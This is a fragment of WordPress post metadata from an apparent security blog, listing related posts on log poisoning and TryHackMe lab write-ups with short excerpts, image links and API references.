&quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=1050%2C600&ssl=1 3x"},"classes":[]},{"id":434,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/03\/what-is-log-poisoning\/","url_meta":{"origin":584,"position":3},"title":"What Is Log Poisoning?","author":"ishsome","date":"February 3, 2024","format":false,"excerpt":"Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems. Log poisoning\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":359,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","url_meta":{"origin":584,"position":4},"title":"TryHackMe: Reset","author":"ishsome","date":"January 28, 2024","format":false,"excerpt":"Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. We will begin our enumeration with NMAP as usual. NMAP \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset] \u2514\u2500$\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":422,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/","url_meta":{"origin":584,"position":5},"title":"TryHackMe: Kitty","author":"ishsome","date":"February 5, 2024","format":false,"excerpt":"Kitty from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine. NMAP We have only two ports open 22 for SSH and HTTP port 80. \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty] \u2514\u2500$ nmap -p22,80 10.10.113.181\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=700%2C400&ssl=1 2x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/584","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=584"}],"version-history":[{"count":4,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/584\/revisions"}],"predecessor-version":[{"id":595,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/584\/revisions\/595"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=584"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=584"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=584"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}